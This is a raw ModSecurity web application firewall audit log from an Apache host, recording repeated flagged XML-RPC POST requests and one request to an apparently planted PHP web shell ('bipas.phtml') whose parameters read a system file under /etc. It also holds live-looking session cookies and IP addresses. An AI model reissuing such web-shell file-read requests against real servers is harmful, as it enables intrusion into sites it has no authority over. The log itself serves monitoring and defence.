wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4bb5d25f64e4418116720653c9dcdd%7C%7C1750161016%7C%7C1750157416%7C%7C5c6d29be381b21fad3b226dd285a528c; expires=Tue, 17 Jun 2025 11:50:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=19ced2c1b32c58082625800f8c4bcec2%7C%7C1750161016%7C%7C1750157416%7C%7C0877794901dd9ba4853808305cc4b65e; expires=Tue, 17 Jun 2025 11:50:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fd088d75-E-- --fd088d75-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6zd3rzia-Xuz8LZxRLvwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988215269035 1027714 (- - -) Stopwatch2: 1749988215269035 1027714; combined=3194, p1=347, p2=2109, p3=172, p4=58, p5=301, sr=84, sw=207, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd088d75-Z-- --5881c12f-A-- [15/Jun/2025:17:21:16.948773 +0530] aE6zs1WckDejtnB0cwJZ5wAAAAA 165.22.247.248 40820 127.0.0.1 7081 --5881c12f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=e2g4c1ad65dfjdarqq113eksli; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_293d756ccd02feb57e2b58bc4d066b%7C%7C1750161075%7C%7C1750157475%7C%7C2d8a9e95c0aea5ef972243133b9e56ad; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c92e58bf0cacfea463162b709dc37ad8%7C%7C1750161075%7C%7C1750157475%7C%7C653cd3ffd1f0c2232ed06b3e5f96a12f User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5881c12f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7n91hq3fb6j2hl11svh32hjn4e; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b85bc6b738ae92659b54bebe9ffd89%7C%7C1750161076%7C%7C1750157476%7C%7Cf9ed49338bed6a4ec2453f8e50972f49; expires=Tue, 17 Jun 2025 11:51:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=8f10403f8dc58ad485696677b05b83eb%7C%7C1750161076%7C%7C1750157476%7C%7Ce8b655492136c6064bfdffc81ba5a0e1; expires=Tue, 17 Jun 2025 11:51:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5881c12f-E-- --5881c12f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6zs1WckDejtnB0cwJZ5wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988275909022 1039837 (- - -) Stopwatch2: 1749988275909022 1039837; combined=3562, p1=470, p2=2702, p3=100, p4=40, p5=155, sr=120, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5881c12f-Z-- --81102d6a-A-- [15/Jun/2025:17:22:16.645781 +0530] aE6z71WckDejtnB0cwJaBwAAAAA 165.22.247.248 50016 127.0.0.1 7081 --81102d6a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=hbdr8bogll4l4rj5sgul9fbege; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d737eccc18a4327d70686fd20e46be%7C%7C1750161135%7C%7C1750157535%7C%7C1a6ce09fb5c33e4179428d725a3e4483; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=bd18744590f18462846a0e02f62a20ee%7C%7C1750161135%7C%7C1750157535%7C%7C8965f4383e57245a20b6db3632d62a61 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --81102d6a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7s2pucv5vg2gj73pn0o0rq3qq4; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d104c140926122d2f03f29163826dd%7C%7C1750161136%7C%7C1750157536%7C%7C28b183bbca0d16f1819d034d5fcc7c43; expires=Tue, 17 Jun 2025 11:52:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=556772cab3184d22f5c3219392b53f09%7C%7C1750161136%7C%7C1750157536%7C%7Cff0098386cc46c4e73b4e37c13eafdc7; expires=Tue, 17 Jun 2025 11:52:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --81102d6a-E-- --81102d6a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6z71WckDejtnB0cwJaBwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988335580148 1065713 (- - -) Stopwatch2: 1749988335580148 1065713; combined=3079, p1=429, p2=2229, p3=102, p4=36, p5=174, sr=131, sw=109, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81102d6a-Z-- --b426e34d-A-- [15/Jun/2025:17:22:28.724285 +0530] aE6z_JRtBAxFAusk8b4nqAAAAAk 34.234.206.30 42142 127.0.0.1 7081 --b426e34d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/modules-load.d&viewfile=//etc/modules-load.d/modules.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.234.206.30 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b426e34d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3066 Connection: close Content-Type: text/html; charset=UTF-8 --b426e34d-H-- Message: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /etc/modules-load.d/modules.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:path: /etc/modules-load.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6z_JRtBAxFAusk8b4nqAAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/modules found within ARGS:viewfile: /etc/modules-load.d/modules.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6z_JRtBAxFAusk8b4nqAAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749988348719126 5243 (- - -) Stopwatch2: 1749988348719126 5243; combined=3021, p1=444, p2=2370, p3=48, p4=45, p5=114, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b426e34d-Z-- --ebda7062-A-- [15/Jun/2025:17:23:16.916322 +0530] aE60K1Cip1xXG9qkRMdvnQAAAAc 165.22.247.248 48872 127.0.0.1 7081 --ebda7062-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=050f1qqergm7uh3lsrnshkbnfn; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_9dd4b54ee485535e0fac064a4f7588%7C%7C1750161195%7C%7C1750157595%7C%7Cbfa499941018d89e1dd7eb12deb375ce; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=acd25d20918a72b2edd6c867832bb332%7C%7C1750161195%7C%7C1750157595%7C%7C6c6fa0970cc63a85d10653ed62cdd7ea User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ebda7062-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=k1oa3mthda7j1pb7509atq49dg; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3db35b31c0fdf7ec97a0d8e1ac60c5%7C%7C1750161196%7C%7C1750157596%7C%7C2eafda8b4310fc27c4b0edfa78ab89e6; expires=Tue, 17 Jun 2025 11:53:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=15e5f17f52daf911894e98a9017c55e4%7C%7C1750161196%7C%7C1750157596%7C%7Ce5b173561bbe11efb8df46930ee645ed; expires=Tue, 17 Jun 2025 11:53:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ebda7062-E-- --ebda7062-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE60K1Cip1xXG9qkRMdvnQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988395890195 1026218 (- - -) Stopwatch2: 1749988395890195 1026218; combined=3630, p1=402, p2=2841, p3=98, p4=39, p5=156, sr=101, sw=94, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ebda7062-Z-- --ea2b7936-A-- [15/Jun/2025:17:24:17.017587 +0530] aE60Z1u1-lKBbvo2E9pD4wAAAAw 165.22.247.248 53006 127.0.0.1 7081 --ea2b7936-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=aa5bdg18ak95loeu777m82k6fm; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_bfb7d4d682a42a4179d5871360d76b%7C%7C1750161255%7C%7C1750157655%7C%7C59123e16ac0ffc496d2aed8ddf358522; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=12ebf055321ce651d41c48bf1b18b737%7C%7C1750161255%7C%7C1750157655%7C%7Cc15e9a5bbd012b6f88ab1fa198bfcf6a User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ea2b7936-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=iot7imdf5h1i016vu2uhdseule; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_83c55faefe8d81f7d0a8660c8d52bc%7C%7C1750161256%7C%7C1750157656%7C%7C2a335535a8ebee908ff5430ebd29a43d; expires=Tue, 17 Jun 2025 11:54:16 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d05c3683d11a28624279da762ec5a338%7C%7C1750161256%7C%7C1750157656%7C%7C627b7d582cfd0fb38e6719d59d148636; expires=Tue, 17 Jun 2025 11:54:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ea2b7936-E-- --ea2b7936-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE60Z1u1-lKBbvo2E9pD4wAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988455975365 1042303 (- - -) Stopwatch2: 1749988455975365 1042303; combined=3927, p1=494, p2=3047, p3=95, p4=35, p5=161, sr=113, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea2b7936-Z-- --b8f2aa4a-A-- [15/Jun/2025:17:25:16.076684 +0530] aE60o1Cip1xXG9qkRMdv2AAAAAc 165.22.247.248 39130 127.0.0.1 7081 --b8f2aa4a-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=hodl441ceou0kcnbud45f7kqff; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_63fd20dc81d701027c10e52a641c32%7C%7C1750161314%7C%7C1750157714%7C%7C89c2fd969884cbf5e775e6327c13ed28; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e5e2b263e612c04ef3bd8b04b0a4a895%7C%7C1750161314%7C%7C1750157714%7C%7C159ebbd42f3cd8e6740770a62624effd User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --b8f2aa4a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jibalfcpleh9n6nade1n059m02; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_96877462a078c305252b04babe93ee%7C%7C1750161315%7C%7C1750157715%7C%7C1bb354313a4175ebdfc26c71e9dcc4af; expires=Tue, 17 Jun 2025 11:55:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=f6a30a22773e6feda331ec8789a83d69%7C%7C1750161316%7C%7C1750157716%7C%7C815bd0c35bb2583010d632a8a5ad18ca; expires=Tue, 17 Jun 2025 11:55:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b8f2aa4a-E-- --b8f2aa4a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE60o1Cip1xXG9qkRMdv2AAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988515049922 1026845 (- - -) Stopwatch2: 1749988515049922 1026845; combined=2876, p1=365, p2=1979, p3=116, p4=49, p5=246, sr=84, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8f2aa4a-Z-- --da1d513c-A-- [15/Jun/2025:17:26:16.074991 +0530] aE6031irsA1ruSKrNWSXhgAAAAQ 165.22.247.248 34088 127.0.0.1 7081 --da1d513c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 Cookie: PHPSESSID=1mm24jalf7qvphsjit20g4fu5j; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_32fc660f2cae497b13de3439cb88a3%7C%7C1750161374%7C%7C1750157774%7C%7C6591272c8173cffa9e6716c273b7772c; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7e49a973dc639974eedba7320efbe3e8%7C%7C1750161374%7C%7C1750157774%7C%7C7af11940f5fb6687039dde9a12a39c75 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --da1d513c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=2o0ra7fe75ijg4j30vubqhqagl; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d627f15877cfc328ed1816d28cb8b8%7C%7C1750161375%7C%7C1750157775%7C%7C2b6710a7ea66a37d5a2e7bcad7d74aea; expires=Tue, 17 Jun 2025 11:56:15 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=34218f0962220cc3b4525b1b05d629ff%7C%7C1750161376%7C%7C1750157776%7C%7C01ab1553ec69ec55706d61929c5222fa; expires=Tue, 17 Jun 2025 11:56:16 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --da1d513c-E-- --da1d513c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6031irsA1ruSKrNWSXhgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988575054846 1020233 (- - -) Stopwatch2: 1749988575054846 1020233; combined=2976, p1=393, p2=2180, p3=106, p4=37, p5=165, sr=90, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da1d513c-Z-- --fe153503-A-- [15/Jun/2025:17:26:25.921346 +0530] aE606ZRtBAxFAusk8b4oLAAAAAk 52.169.195.28 60512 127.0.0.1 7081 --fe153503-B-- GET /hitech-news.com HTTP/1.0 Host: www.sarvasya.com X-Real-IP: 52.169.195.28 X-Accel-Internal: /internal-nginx-static-location Connection: close --fe153503-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html; charset=UTF-8 --fe153503-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarvasya.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarvasya.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarvasya.com"] [uri "/hitech-news.com"] [unique_id "aE606ZRtBAxFAusk8b4oLAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarvasya.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749988585651288 270110 (- - -) Stopwatch2: 1749988585651288 270110; combined=1558, p1=298, p2=1174, p3=0, p4=0, p5=85, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe153503-Z-- --3b3a2651-A-- [15/Jun/2025:17:27:16.107925 +0530] aE61G1irsA1ruSKrNWSXrQAAAAQ 165.22.247.248 45788 127.0.0.1 7081 --3b3a2651-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=bptlcne2isic8qckshb0adt3cg; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_a1c3790ef82355b97a999d397e26a3%7C%7C1750161434%7C%7C1750157834%7C%7C7968fc55a99c6beb0889df98609e84c6; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=866895b24f6927798c55a46d86bb72e9%7C%7C1750161434%7C%7C1750157834%7C%7C12be8dfca68962db135bf19c8fce419e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --3b3a2651-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close 